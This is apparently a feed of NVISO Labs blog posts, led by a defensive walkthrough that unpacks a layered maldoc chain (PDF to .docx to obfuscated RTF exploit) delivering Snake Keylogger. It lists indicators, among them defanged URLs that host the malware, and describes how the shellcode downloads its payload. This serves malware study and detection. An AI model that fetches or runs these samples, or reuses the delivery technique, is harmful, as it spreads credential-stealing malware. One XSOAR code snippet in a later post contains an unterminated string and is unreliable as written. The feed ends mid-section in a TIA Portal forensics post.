Option -O is used to instruct pdf-parser to decompress stream objects (/ObjStm) and include the contained objects into the statistical report. If this option is omitted, then pdf-parser’s report will be similar to pdfid’s report. To know more about this subject, we recommend this blog post.

In this report, we see again keywords like /EmbeddedFile. 1 is the counter (e.g., there is one embedded file) and 28 is the index of the PDF object for this embedded file.
New keywords that did appear, are /JS and /JavaScript. They indicate the presence of scripts (code) in the PDF document. The objects that represent these scripts, are found (compressed) inside the stream objects (/ObjStm). That is why they did not appear in pdfid’s report, and why they do in pdf-parser’s report (when option -O is used).
JavaScript inside a PDF document is restricted in its interactions with the operating system resources: it can not access the file system, the registry, … .
Nevertheless, the included JavaScript can be malicious code (a legitimate reason for the inclusion of JavaScript in a PDF document, is input validation for PDF forms).
But we will first take a look at the embedded file. We to this by searching for the /EmbeddedFile keyword, like this:

Figure 9: Searching for embedded files

Notice that the search option -s is not case sensitive, and that you do not need to include the leading slash (/).
pdf-parser found one object that represents an embedded file: the object with index 28.
Notice the keywords /Filter /Flatedecode: this means that the embedded file is not included into the PDF document as-is, but that it has been “filtered” first (e.g., transformed). /FlateDecode indicates which transformation was applied: “deflation”, e.g., zlib compression.
To obtain the embedded file in its original form, we need to decompress the contained data (stream), by applying the necessary filters. This is done with option -f:

Figure 10: Decompressing the embedded file

The long string of data (it looks random) produced by pdf-parser when option -f is used, is the decompressed stream data in Python’s byte string representation. Notice that this data starts with PK: this is a strong indication that the embedded file is a ZIP container.
We will now use option -d to dump (write) the contained file to disk. Since it is (potentially) malicious, we use again extension .vir.

Figure 11: Extracting the embedded file to disk

File embedded.vir is the embedded file.

Office document analysis

Since I was told that the embedded file is an Office document, we use a tool I developed for Office documents: oledump.py
But if you would not know what type the embedded file is, you would first want to determine this. We will actually have to do that later, with a downloaded file.

Now we run oledump.py on the embedded file we extracted: embedded.vir

Figure 12: No ole file was found

The output of oledump here is a warning: no ole file was found.
A bit of background can help understand what is happening here. Microsoft Office document files come in 2 major formats: ole files and OOXML files.
Ole files (official name: Compound File Binary Format) are the “old” file format: the binary format that was default until Office 2007 was released. Documents using this internal format have extensions like .doc, .xls, .ppt, …
OOXML files (Office Open XML) are the “new” file format. It’s the default since Office 2007. Its internal format is a ZIP container containing mostly XML files. Other contained file types that can appear are pictures (.png, .jpeg, …) and ole (for VBA macros for example). OOXML files have extensions like .docx, .xlsx, .docm, .xlsm, …
OOXML is based on another format: OPC.
oledump.py is a tool to analyze ole files. Most malicious Office documents nowadays use VBA macros. VBA macros are always stored inside ole files, even with the “new” format OOXML. OOXML documents that contain macros (like .docm), have one ole file inside the ZIP container (often named vbaProject.bin) that contains the actual VBA macros.
Now, let’s get back to the analysis of our embedded file: oledump tells us that it found no ole file inside the ZIP container (OPC).
This tells us 1) that the file is a ZIP container, and more precisely, an OPC file (thus most likely an OOXML file) and 2) that it does not contain VBA macros.
If the Office document contains no VBA macros, we need to look at the files that are present inside the ZIP container. This can be done with a dedicated tool for the analysis of ZIP files: zipdump.py
We just need to pass the embedded file as parameter to zipdump, like this:

Figure 13: Looking inside the ZIP container

Every line of output produced by zipdump, represents a contained file.
The presence of folder “word” tells us that this is a Word file, thus extension .docx (because it does not contain VBA macros).
When an OOXML file is created/modified with Microsoft Office, the timestamp of the contained files will always be 1980-01-01.
In the result we see here, there are many files that have a different timestamp: this tells us, that this .docx file has been altered with a ZIP tool (like WinZip, 7zip, …) after it was saved with Office.
This is often an indicator of malicious intend.
If we are presented with an Office document that has been altered, it is recommended to take a look at the contained files that were most recently changed, as this is likely the file that has been tampered for malicious purposed.
In our extracted sample, that contained file is the file with timestamp 2022-03-23 (that’s just a day ago, time of writing): file document.xml.rels.
We can use zipdump.py to take a closer look at this file. We do not need to type its full name to select it, we can just use its index: 14 (this index is produced by zipdump, it is not metadata).
Using option -s, we can select a particular file for analysis, and with option -a, we can produce a hexadecimal/ascii dump of the file content. We start with this type of dump, so that we can first inspect the data and assure us that the file is indeed XML (it should be pure XML, but since it has been altered, we must be careful).

Figure 14: Hexadecimal/ascii dump of file document.xml.rels

This does indeed look like XML: thus we can use option -d to dump the file to the console (stdout):

Figure 15: Using option -d to dump the file content

There are many URLs in this output, and XML is readable to us humans, so we can search for suspicious URLs. But since this is XML without any newlines, it’s not easy to read. We might easily miss one URL.
Therefor, we will use a tool to help us extract the URLs: re-search.py
re-search.py is a tool that uses regular expressions to search through text files. And it comes with a small embedded library of regular expressions, for URLs, email addresses, …
If we want to use the embedded regular expression for URLs, we use option -n url.
Like this:

Figure 16: Extracting URLs

Notice that we use option -u to produce a list of unique URLs (remove duplicates from the output) and that we are piping 2 commands together. The output of command zipdump is provided as input to command re-search by using a pipe (|).
Many tools in Didier Stevens’ Suite accept input from stdin and produce output to stdout: this allows them to be piped together.
Most URLs in the output of re-search have schemas.openxmlformats.org as FQDN: these are normal URLs, to be expected in OOXML files. To help filtering out URLs that are expected to be found in OOXML files, re-search has an option to filter out these URLs. This is option -F with value officeurls.

Figure 17: Filtered URLs

One URL remains: this is suspicious, and we should try to download the file for that URL.

Before we do that, we want to introduce another tool that can be helpful with the analysis of XML files: xmldump.py. xmldump parses XML files with Python’s built-in XML parser, and can represent the parsed output in different formats. One format is “pretty printing”: this makes the XML file more readable, by adding newlines and indentations. Pretty printing is achieved by passing parameter pretty to tool xmldump.py, like this:

Figure 18: Pretty print of file document.xml.rels

Notice that the <Relationship> element with the suspicious URL, is the only one with attribute TargetMode=”External”.
This is an indication that this is an external template, that is loaded from the suspicious URL when the Office document is opened.
It is therefore important to retrieve this file.

Downloading a malicious file

We will download the file with curl. Curl is a very flexible tool to perform all kinds of web requests.
By default, curl is not installed in Ubuntu:

Figure 19: Curl is missing

But it can of course be installed:

Figure 20: Installing curl

And then we can use it to try to download the template. Often, we do not want to download that file using an IP address that can be linked to us or our organisation. We often use the Tor network to hide behind. We use option -x 127.0.0.1:9050 to direct curl to use a proxy, namely the Tor service running on our machine. And then we like to use option -D to save the headers to disk, and option -o to save the downloaded file to disk with a name of our choosing and extension .vir.
Notice that we also number the header and download files, as we know from experience, that often several attempts will be necessary to download the file, and that we want to keep the data of all attempts.

Figure 21: Downloading with curl over Tor fails

This fails: the connection is refused. That’s because port 9050 is not open: the Tor service is not installed. We need to install it first:

Figure 22: Installing Tor

Next, we try again to download over Tor:

Figure 23: The download still fails

The download still fails, but with another error. The CONNECT keyword tells us that curl is trying to use an HTTP proxy, and Tor uses a SOCKS5 proxy. I used the wrong option: in stead of option -x, I should be using option –socks5 (-x is for HTTP proxies).

Figure 24: The download seems to succeed

But taking a closer look at the downloaded file, we see that it is empty:

Figure 25: The downloaded file is empty, and the headers indicate status 301

The content of the headers file indicates status 301: the file was permanently moved.
Curl will not automatically follow redirections. This has to be enabled with option -L, let’s try again:

Figure 26: Using option -L

And now we have indeed downloaded a file:

Figure 27: Download result

Notice that we are using index 2 for the downloaded files, as to not overwrite the first downloaded files.
Downloading over Tor will not always work: some servers will refuse to serve the file to Tor clients.
And downloading with Curl can also fail, because of the User Agent String. The User Agent String is a header that Curl includes whenever it performs a request: this header indicates that the request was done by curl. Some servers are configured to only serve files to clients with the “proper” User Agent String, like the ones used by Office or common web browsers.
If you suspect that this is the case, you can use option -A to provide an appropriate User Agent String.

As the downloaded file is a template, we expect it is an Office document, and we use oledump.py to analyze it:

Figure 28: Analyzing the downloaded file with oledump fails

But this fails. Oledump does not recognize the file type: the file is not an ole file or an OOXML file.
We can use Linux command file to try to identify the file type based on its content:

Fgiure 29: Command file tells us this is pure text

If we are to believe this output, the file is a pure text file.
Let’s do a hexadecimal/ascii dump with command xxd. Since this will produce many pages of output, we pipe the output to the head command, to limit the output to the first 10 lines:

Figure 30: Hexadecimal/ascii dump of the downloaded file

RTF document analysis

The file starts with {\rt : this is a deliberately malformed RTF file. Richt Text Format is a file format for Word documents, that is pure text. The format does not support VBA macros. Most of the time, malicious RTF files perform malicious actions through exploits.
Proper RTF files should start with {\rtf1. The fact that this file starts with {\rt. is a clear indication that the file has been tampered with (or generated with a maldoc generator): Word will not produce files like this. However, Word’s RTF parser is forgiving enough to accept files like this.

Didier Stevens’ Suite contains a tool to analyze RTF files: rtfdump.py
By default, running rtfdump.py on an RTF file produces a lot of output:

Figure 31: Parsing the RTF file

The most important fact we know from this output, is that this is indeed an RTF file, since rtfdmp was able to parse it.
As RTF files often contain exploits, they often use embedded objects. Filtering rtfdump’s output for embedded objects can be done with option -O:

Figure 32: There are no embedded objects

No embedded objects were found. Then we need to look at the hexadecimal data: since RTF is a text format, binary data is encoded with hexadecimal digits. Looking back at figure 30, we see that the second entry (number 2) contains 8349 hexadecimal digits (h=8349). That’s the first entry we will inspect further.
Notice that 8349 is an uneven number, and that encoding a single byte requires 2 hexadecimal digits. This is an indication that the RTF file is obfuscated, to thwart analysis.
Using option -s, we can select entry 2:

Figure 33: Selecting the second entry

If you are familiar with the internals of RTF files, you would notice that the long, uninterrupted sequences of curly braces are suspicious: it’s another sign of obfuscation.
Let’s try to decode the hexadecimal data inside entry 2, by using option -H

Figure 34: Hexadecimal decoding

After some randomly looking bytes and a series of NULL bytes, we see a lot of FF bytes. This is typical of ole files. Ole files start with a specific set of bytes, known as a magic header: D0 CF 11 E0 A1 B1 1A E1.
We can not find this sequence in the data, however we find a sequence that looks similar: 0D 0C F1 1E 0A 1B 11 AE 10 (starting at position 0x46)
This is almost the same as the magic header, but shifted by one hexadecimal digit. This means that the RTF file is obfuscated with a method that has not been foreseen in the deobfuscation routines of rtfdump. Remember that the number of hexadecimal digits is uneven: this is the result. Should rtfdump be able to properly deobfuscate this RTF file, then the number would be even.
But that is not a problem: I’ve foreseen this, and there is an option in rtfdump to shift all hexadecimal strings with one digit. This is option -S:

Figure 35: Using option -S to manually deobfuscate the file

We have different output now. Starting at position 0x47, we now see the correct magic header: D0 CF 11 E0 A1 B1 1A E1
And scrolling down, we see the following:

Figure 36: ole file directory entries (UNICODE)

We see UNICODE strings RootEntry and ole10nAtiVE.
Every ole file contains a RootEntry.
And ole10native is an entry for embedded data. It should all be lower case: the mixing of uppercase and lowercase is another indicator for malicious intend.

As we have now managed to direct rtfdump to properly decode this embedded olefile, we can use option -i to help with the extraction:

Figure 37: Extraction of the olefile fails

Unfortunately, this fails: there is still some unresolved obfuscation. But that is not a problem, we can perform the extraction manually. For that, we locate the start of the ole file (position 0x47) and use option -c to “cut” it out of the decoded data, like this:

Figure 38: Hexadecimal/ascii dump of the embedded ole file

With option -d, we can perform a dump (binary data) of the ole file and write it to disk:

Figure 39: Writing the embedded ole file to disk

We use oledump to analyze the extracted ole file (ole.vir):

Figure 40: Analysis of the extracted ole file

It succeeds: it contains one stream.
Let’s select it for further analysis:

Figure 41: Content of the stream

This binary data looks random.
Let’s use option -S to extract strings (this option is like the strings command) from this binary data:

Figure 42: Extracting strings

There’s nothing recognizable here.

Let’s summarize where we are: we extracted an ole file from an RTF file that was downloaded by a .docx file embedded in a PDF file. When we say it like this, we can only think that this is malicious.

Shellcode analysis

Remember that malicious RTF files very often contain exploits? Exploits often use shellcode. Let’s see if we can find shellcode.
To achieve this, we are going to use scdbg, a shellcode emulator developed by David Zimmer.
First we are going to write the content of the stream to a file:

Figure 43: Writing the (potential) shellcode to disk

scdbg is an free, open source tool that emulates 32-bit shellcode designed to run on the Windows operating system. Started as a project running on Windows and Linux, it is now further developed for Windows only.

Figure 44: Scdbg

We download Windows binaries for scdbg:

Figure 45: Scdbg binary files

And extract executable scdbg.exe to our working directory:

Figure 46: Extracting scdbg.exe
Figure 47: Extracting scdbg.exe

Although scdbg.exe is a Windows executable, we can run it on Ubuntu via Wine:

Figure 48: Trying to use wine

Wine is not installed, but by now, we know how to install tools like this:

Figure 49: Installing wine
Figure 50: Tasting wine 😊

We can now run scdbg.exe like this:

wine scdbg.exe

scdbg requires some options: -f sc.vir to provide it with the file to analyze

Shellcode has an entry point: the address from where it starts to execute. By default, scdbg starts to emulate from address 0. Since this is an exploit (we have not yet recognized which exploit, but that does not prevent us from trying to analyze the shellcode), its entry point will not be address 0. At address 0, we should find a data structure (that we have not identified) that is exploited.
To summarize: we don’t know the entry point, but it’s important to know it.
Solution: scdbg.exe has an option to try out all possible entry points. Option -findsc.
And we add one more option to produce a report: -r.

Let’s try this:

Figure 51: Running scdbg via wine

This looks good: after a bunch of messages and warnings from Wine that we can ignore, scdbg proposes us with 8 (0 through 7) possible entry points. We select the first one: 0

Figure 52: Trying entry point 0 (address 0x95)

And we are successful: scdbg.exe was able to emulate the shellcode, and show the different Windows API calls performed by the shellcode. The most important one for us analysts, is URLDownloadToFile. This tells us that the shellcode downloads a file and writes it to disk (name vbc.exe).
Notice that scdbg did emulate the shellcode: it did not actually execute the API calls, no files were downloaded or written to disk.

Although we don’t know which exploit we are dealing with, scdbg was able to find the shellcode and emulate it, providing us with an overview of the actions executed by the shellcode.
The shellcode is obfuscated: that is why we did not see strings like the URL and filename when extracting the strings (see figure 42). But by emulating the shellcode, scdbg also deobfuscates it.

We can now use curl again to try to download the file:

Figure 53: Downloading the executable

And it is indeed a Windows executable (.NET):

Figure 54: Headers
Figure 55: Running command file on the downloaded file

To determine what we are dealing with, we try to look it up on VirusTotal.
First we calculate its hash:

Figure 56: Calculating the MD5 hash

And then we look it up through its hash on VirusTotal:

Figure 57: VirusTotal report

From this report, we conclude that the executable is Snake Keylogger.

If the file would not be present on VirusTotal, we could upload it for analysis, provided we accept the fact that we can potentially alert the criminals that we have discovered their malware.

In the video for this blog post, there’s a small bonus at the end, where we identify the exploit: CVE-2017-11882.

Conclusion
This is a long blog post, not only because of the different layers of malware in this sample. But also because in this blog post, we provide more context and explanations than usual.
We explained how to install the different tools that we used.
We explained why we chose each tool, and why we execute each command.
There are many possible variations of this analysis, and other tools that can be used to achieve similar results. I for example, would pipe more commands together.
The important aspect to static analysis like this one, is to use dedicated tools. Don’t use a PDF reader to open the PDF, don’t use Office to open the Word document, … Because if you do, you might execute the malicious code.
We have seen malicious documents like this before, and written blog post for them like this one. The sample we analyzed here, has more “layers” than these older maldocs, making the analysis more challenging.

In that blog post, we also explain how this kind of malicious document “works”, by also showing the JavaScript and by opening the document inside a sandbox.

IOCs

Type Value
PDF sha256: 05dc0792a89e18f5485d9127d2063b343cfd2a5d497c9b5df91dc687f9a1341d
RTF sha256: 165305d6744591b745661e93dc9feaea73ee0a8ce4dbe93fde8f76d0fc2f8c3f
EXE sha256: 20a3e59a047b8a05c7fd31b62ee57ed3510787a979a23ce1fde4996514fae803
URL hxxps://vtaurl[.]com/IHytw
URL hxxp://192[.]227[.]196[.]211/FRESH/fresh[.]exe

These files can be found on VirusTotal, MalwareBazaar and Malshare.

About the authors

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis. You can find Didier on Twitter and LinkedIn.

You can follow NVISO Labs on Twitter to stay up to date on all our future research and publications.

✇ NVISO Labs

Cortex XSOAR Tips & Tricks – Using The API In Automations

By: wstinkens

Introduction

When developing automations in Cortex XSOAR, you can use the Script Helper in the built-in Cortex XSOAR IDE to view all the scripts and commands available for automating tasks. When there is no script or command available for the specific task you want to automate, you can use the Cortex XSOAR API to automate most tasks available in the web interface.

In this blogpost we will show you how to discover the API endpoints in Cortex XSOAR for specific tasks and which options are available to use them in your own custom automations. As an example we will automate replacing evidences in the incident evidence board.

To enable you to use the Cortex XSOAR API in your own automations, we have created a nitro_execute_http_request function which is available on the NVISO GitHub:

https://github.com/NVISOsecurity/blogposts/blob/master/CortexXSOAR/nitro_execute_http_request.py

Cortex XSOAR API Endpoints

Before you can use the Cortex XSOAR API in your automation, you will need to know which API endpoints are available. The Cortex XSOAR API documentation can be found in Settings > Integrations > API Keys:

Here you can see the following links:

  • View Cortex XSOAR API: Open the API documentation on the XSOAR server
  • Download Cortex XSOAR API Guide: Download a PDF with the API documentation
  • Download REST swagger file: Download a JSON file which can be imported into a Swagger editor

You can use these links to view all the documented API Endpoints for Cortex XSOAR with the path, parameters and responses including example request body’s and responses. Importing the Swagger JSON file into a Swagger Editor or Postman will allow you to interact with the API for testing without writing a single line of code.

Using The API In Automations

Once you have determined the Cortex XSOAR API endpoint to use, you have 2 options available for use in an automation.

The first option is by using the internalHttpRequest method of the demisto class. This will allow you to do an internal HTTP request on the Cortex XSOAR server. It is the faster of the 2 options but there is a permissions limitation when using this in playbooks. The request runs with the permissions of the executing user, when a command is being executed manually (such as via the War Room or when browsing a widget). When run via a playbook, it will run with a read-only user with limited permissions isolated to the current incident only.

The second option for using the API in automations is the Demisto REST API integration. This integration is part of the Demisto REST API content pack available in the Cortex XSOAR Marketplace.

After installing the content pack, you will need to create an API key in Settings > Integrations > API Keys:

Click on Get Your Key, give it a name and click Generate key:

Copy your key and store it in a secure location:

If you have a multi-tenant environment, you will need to synchronize this key to the different accounts.

Next you will need to configure the Demisto REST API integration:

Click Add instance and copy the API key and click Test to verify that the integration is working correctly:

You will now be able to use the following commands in your automations:

  • demisto-api-delete: send HTTP DELETE request
  • demisto-api-download: Download files from XSOAR server
  • demisto-api-get: send HTTP GET requests
  • demisto-api-multipart: Send HTTP Multipart request to upload files to XSOAR server
  • demisto-api-post: send HTTP POST request
  • demisto-api-put: send HTTP PUT request
  • demisto-delete-incidents: Delete XSOAR incidents

To do HTTP requests when only read permissions are required, you should use the internalHTTPRequest method of the demisto class because it does not require an additional integration and has better performance. From the Demisto REST API integration, you will mostly be using the demisto-api-post command for doing HTTP Post requests in your automations when write permissions are required.

nitro_execute_http_request()

Similar to the demisto.executeCommand method, the demisto.internalHttpRequest does not throw an error when the request fails. Therefore, we have created a nitro_execute_http_request wrapper function to add error handling which you can use in your own custom automations.

import json


def nitro_execute_http_request(method: str, uri: str, body: dict = None) -> dict:
    """
    Send internal http requests to XSOAR server
    :type method: ``str``
    :param method: HTTP Method (GET / POST / PUT / DELETE)
    :type uri: ``str``
    :param uri: Request URI
    :type body: ``dict``
    :param body: Body of request
    :return: dict of response body
    :rtype: ``dict``
    """

    response = demisto.internalHttpRequest(method, uri, body)
    response_body = json.loads(response.get('body'))

    if response.get('statusCode') != 200:
        raise Exception(f"Func: nitro_execute_http_request; {response.get('status')}: {response_body.get('detail')}; "
                        f"error: {response_body.get('error')}")
    else:
        return response_body

When you use this function to call demisto.internalHttpRequest, it will return an error when the HTTP request fails:

try:
    uri = "/evidence/search"
    method = "POST"
    body = {"incidentID": '9999999'}

    return_results(nitro_execute_http_request(method=method, uri=uri, body=body))
except Exception as ex:
    return_error(f'Failed to execute nitro_execute_http_request. Error: {str(ex)}')

We have added this custom function to the CommonServerUserPython automation. This automation is created for user-defined code that is merged into each script and integration during execution. It will allow you to use nitro_execute_http_request in all your custom automations.

Incident Evidences Example

To provide you an example of how to use the API in an automation, we will show how to replace evidences in the incident Evidence Board in Cortex XSOAR. We will build on the example of the previous post in this series where we add evidences based on the tags of an entry in the war room:

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': 'Example Evidence'})

If you search the script helper in the built-in IDE, you will see that there is already an AddEvidence automation:

When using this command in a playbook to add evidences to the incident Evidence Board, you will get duplicates when the playbooks is run multiple times. This could lead to confusing for the SOC analyst and should be avoided. A replace argument is not available in the AddEvidence command but we can implement this using the Cortex XSOAR API.

To implement the replace functionality, we will first need to search for an entry in the incident Evidence Board with the same description, delete it and then add it again. There are no built-in automations available that support this but it is supported by the Cortex XSOAR API.

If we search the API documentation, we can see the following API Endpoints:

  • /evidence/search
  • /evidence/delete

To search for evidences with the same description, we have created a function:

def nitro_get_incident_evidences(incident_id: str, query: str = None) -> list:
    """
    Get list of incident evidences
    :type incident_id: ``str``
    :param incident_id: XSOAR incident id
    :type query: ``str``
    :param query: query for evidences
    :return: list of evidences
    :rtype: ``list``
    """

    uri = "/evidence/search"
    body = {"incidentID": incident_id}
    if query:
        body.update({"filter": {"query": query}})

    results = nitro_execute_http_request(method='POST', uri=uri, body=body)

    return results.get('evidences', [])

This function uses the wrapper function of the faster internalHTTPRequest method in the demisto class because it does not require write permissions.

To delete the evidences we have created a second function which uses the demisto-api-post command because write permissions are required:

def nitro_delete_incident_evidence(evidence_id: str):
    """
    Delete incident evidence
    :type evidence_id: ``str``
    :param evidence_id: XSOAR evidence id
    """

    uri = '/evidence/delete'
    body = {'evidenceID': evidence_id}

    nitro_execute_command(command='demisto-api-post', args={"uri": uri, "body": body})

We use the nitro_execute_command function we discussed in a previous post in this series to add error handling.

We use these 2 functions to first search for evidences with the same description, delete them and add the tagged war room entries as evidence in the incident Evidence Board again.

description = 'Example Evidence'
incident_id = demisto.incident().get('id)

query = f"description:\"{description}\""
evidences = nitro_get_incident_evidences(incident_id=incident_id, query=query)

for evidence in evidences:
    nitro_delete_incident_evidence(evidence.get('id'))

results = nitro_execute_command(command='getEntries', args={'filter': {'tags': 'evidence'}})

entry_ids = [result.get('ID') for result in results]

for entry_id in entry_ids:
    nitro_execute_command(command='AddEvidence', args={'entryIDs': entry_id, 'desc': description })

References

https://xsoar.pan.dev/docs/concepts/xsoar-ide#the-script-helper

https://xsoar.pan.dev/marketplace/details/DemistoRESTAPI

https://xsoar.pan.dev/docs/reference/api/demisto-class#internalhttprequest

About the author

Wouter is an expert in the SOAR engineering team in the NVISO SOC. As the lead engineer and development process lead he is responsible for the design, development and deployment of automated analysis workflows created by the SOAR Engineering team to enable the NVISO SOC analyst to faster detect attackers in customers environments. With his experience in cloud and devops, he has enabled the SOAR engineering team to automate the development lifecycle and increase operational stability of the SOAR platform.

Wouter via his LinkedIn page.


Want to learn more about SOAR? Sign- up here and we will inform you about new content and invite you to our SOAR For Fun and Profit webcast.
https://forms.office.com/r/dpuep3PL5W

✇ NVISO Labs

NVISO achieves Palo Alto Networks Cortex eXtended Managed Detection and Response (XMDR) Specialization

By: Carola Wondrak

Brussels, March, 23, 2022 Managed Security Services provider NVISO, today announced it has become a Palo Alto Networks Cortex® XMDR Specialization partner. NVISO joins a select group of channel partners who have earned this distinction through operational capabilities and fulfillment of business requirements and completion of technical, sales enablement and specialization examinations. The Cortex XMDR Specialization will enable NVISO to combine the power of best-in-class Cortex XDR™ detection and response solution with their managed services offerings — helping customers worldwide streamline security operations center (SOC) operations and quickly mitigate cyberthreats. 

 “We are excited to partner with Palo Alto Networks to provide our customers with next-generation security technology for our services,” said Carola Wondrak, Business Development Lead at NVISO. Erik Van Buggenhout, Partner at NVISO emphasizes this further: “NVISO’s priority has always been delivering world-class cyber security services to our clients that are not bound to particular technology products or vendors. This being said, we consider Palo Alto Cortex a best-in-class, leading, platform which we rely on at the core of our managed services. We are thus very excited to be recognized as an XMDR Specialization partner.”

“Organizations need effective detection and response across the network, endpoint, and cloud but managing today’s threats effectively is a massive undertaking,” said Karl Soderlund, senior vice president, Worldwide Channel Sales at Palo Alto Networks. “NVISO’s commitment to attain the Cortex XMDR Specialization will give their managed security services customers peace of mind that the services they are choosing will mitigate security gaps and relieve the day-to-day burden of security operations for customers with 24/7 coverage.”

NVISO has a successful history with Palo Alto Networks, specifically focusing on Cortex solutions.  Through everything NVISO does, automation plays a crucial role. As an XSOAR MSSP partner of Palo Alto Networks, NVISO builds on Cortex XSOAR for its own internal efficiency through automation and orchestration, yet also provides automation services to its customers as an MSSP. NVISO has flexible deployments models whereby it can provide either dedicated, co-managed (shared responsibility between NVISO and the end customer) or fully outsourced XSOAR deployment models.

To achieve Specialization status, Palo Alto Networks partner organizations must have Cortex XDR-certified SOC analysts/threat hunters on staff and available 24/7. Partners seeking this XMDR Specialization distinction must also complete both technical and sales enablement and specialization examinations. Cortex XMDR Specialization partners combine experienced analysts, mature operational processes and proven customer support with Palo Alto Networks market-leading security products, enabling them to provide customers comprehensive visibility, detection and response across network, endpoint and cloud assets, combined with best-in-class threat prevention and in-depth security expertise.

To learn more about NVISOs Managed Services, visit: Managed Detect & Respond | NVISO

NVISO is a European cyber security firm specialized in IT security consultancy and managed security services. Looking to further expand its footprint throughout Europe, NVISO currently has as offices in Brussels, Frankfurt and Munich, with new office openings planned later this year.

NVISO’s expert workforce consists of over 160 cyber security professionals, spread over Belgium, Germany, France, Austria and Greece. With world-class expertise as a key differentiator, our experts have obtained most of the well-known certifications in the industry, author and teach SANS courses and regularly present their expertise at conferences.

                                                                        ###

Media Contact:

Carola Wondrak
NVISO

tel:003225884380

[email protected]

✇ NVISO Labs

Investigating an engineering workstation – Part 2

By: Olaf Schwarz

In this second post we will focus on specific evidence written by the TIA Portal. As you might remember, in the first part we covered standard Windows-based artefacts regarding execution of the TIA Portal and usage of projects.

The TIA Portal maintains a file called “Settings.xml” under the following path: C:\Users\$USERNAME\AppData\Roaming\Siemens\Portal V15_1\Settings\. Please remember we used version 15.1 only. The path contains the version number for the TIA Portal, so at least the path will most likely change for different versions. It is also possible that the content and the behaviour of the nodes discussed below changes with different versions of the TIA Portal.

The file can be investigated with a text editor of your choice as it has a plain XML structure. Many nodes contain readable strings, although there are some exceptions that contain encoded binary data.  

A few nodes are of specific interest:

  • “LastOpenedProject”
  • “LRUProjectStorageLocation”
  • “LRUProjectArchiveStorageLocation”
  • “LastProjects”
  • “ConnectionServices”
  • “LoadServices”

We will look at each of these nodes, what information they contain and how they behaved in our testing. As the file is present for a specific user, everything in it is related to that specific user account. So if we state that some information represents the last opened project, it is meant for the specific user the Settings.xml file belongs to and not globally for the entire system.

LastOpenedProject

Figure 1: Settings.xml LastOpenedProject node
Description

This node is located under the SettingNode named “General” and contains one child node. As you can see from the screenshot above, this child node is a full path to an “.ap15_1” file. As the name already implies, this is the last project opened with the TIA Portal.  In this example the project root folder is “testproject_09”, the storage location of the project is located at “C:\Users\nviso\Documents\Automation\” and the file used to open the project “testproject_09.ap15_1”.

Content

Last opened project

Behaviour
  • If the TIA Portal is opened and closed without opening a project, the child note will be empty. This also represents exactly what happened: no project was opened.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal. Removing a project from this list is a native build in function of the TIA Portal.
Figure 2: TIA Portal dialog to open and remove recently used projects

LRUProjectStorageLocation

Figure 3: Settings.xml LRUProjectStorageLocation node
Description

This node is located under the SettingNode named “General”, as a neighbour of the “LastOpenenProject” node we discussed earlier. It also contains only one child node representing the path to the location where the most recently opened project is located. More precisely to the location of the root folder of the project.

Content

Path to folder containing the most recently opened project

Behaviour
  • The value of the child node is not affected if the TIA Portal is opened & closed without opening any project.
  • The value is not affected if a project is removed from the recently used projects in the TIA Portal.

LRUProjectArchiveStorageLocation

Figure 4: Settings.xml LRUProjectArchiveStorageLocation node
Description

This node is located under the SettingNode named “General”, as a neighbour of the “LastOpenenProject” node we discussed earlier. If a project file is opened in the TIA Portal and the archive function is used (Main menu bar: Project -> Archive…) the full path to the folder specified in the “Target path” field is written to this value.

Figure 5: TIA Portal Archive Project Dialog
Content

Full path to the most recent folder specified to archive a project.

Behaviour
  • The value is overwritten if a different location is chosen while archiving a project.
  • Unless the archive function is used, the node is not present in the “Settings.xml” file.

LastProjects

Figure 6: Settings.xml LastProjects node
Description

The “LastProjects” node is a child node of the SettingsNode named “ProjectSettings”. The “ProjectSettings” node is located at the same level as the “General” node discussed earlier. As shown in the excerpt above, the node contains a list of full path entries for “.apXX” files. This list shows the opened projects represented in chronological order, with the most recent project on top.

Content

Chronological orders list of opened projects

Behaviour
  • The content of this node is not affected when the TIA Portal is opened and closed without opening a project.
  • If a project is removed from the list of recently used projects, the corresponding “String” node containing the full path to the project is removed from the list. The chronological order will still be intact afterwards.
  • Entries in this list are unique. If a project already present in the list is opened again, the entry will be moved to the top position.
  • In our testing we have seen 10+ child nodes for opened projects. We did not test for a maximum value of projects that are tracked in the “LastProjects” node.
  • If a new project is created and saved in the TIA Portal, it will show up in this list, but not show up in the Jump List. (We covered this in part 1 of the series)

ConnectionService

Figure 7: Settings.xml ConnectionService node (parts have been remove for readability)
Description

The “ConnectionService” node is a neighbour of the “ProjectSettings” and the “General” node. It contains child nodes named after the full path of projects. These child nodes can contain the creation date and time of the project in UTC, stored in a child node called “CreationTime”. Further they can contain a child node called “ControllerConfiguration” which might have several child nodes for configured PLCs. Theses PLC nodes (“{1052700-1391}” in the example above) shows information how to communicate with the PLC, in the node named “OamAddress”. As demonstrated in the screenshot the “OamAddress” node can give us information like the IP-Address and subnet-mask used to reach the PLC.

Content

List of projects that were worked on within the TIA Portal. Under certain circumstances creation time of the project in UTC and connection information for configured PLCs is shown.

Behaviour
  • The content of this node and its child’s is not affected when the TIA Portal is opened and closed without opening a project.
  • The content of this node and its child’s is not affected if a project is removed from the recently used projects in the TIA Portal.
  • A “SettingNode” entry for a specific project is not added directly after an empty project is created, neither is it added when an empty project is re-open again.
  • A “SettingNode” including the project creation timestamp in UTC is created when you start to configure the project, for example by adding a PLC to it.
  • The creation timestamp is taken from within the project, so if a project file is copied to a different host and opened there, the creation date and time of the original project is listed.
  • The “SettingNode” for a specific project is extended with a “SettingNode” named “ControllerConfiguration” if communication with a configured PLC has been performed, in example using the “go online” function or downloading logic to the PLC.
  • If multiple PLCs are configured, the “ControllerConfiguration” node contains multiple child nodes representing the configuration for each of the PLCs.
  • Our testing has shown that the child nodes containing the information per PLC are not randomly named. If the same PLC is used in multiple projects, the node will get the same name. Applying this to our example above means, that if the PLC is added to three different projects, you will find a SettingNode named “{1052700-1391}” in all three “ControllerConfiguration” sections. Of cause only if the conditions to write a “ControllerConfiguration” are met.
  • If a PLC is removed from a project, the corresponding child node under “ControllerConfiguration” is not removed.

LoadServices

Figure 8: Settings.xml LoadServices node
Description

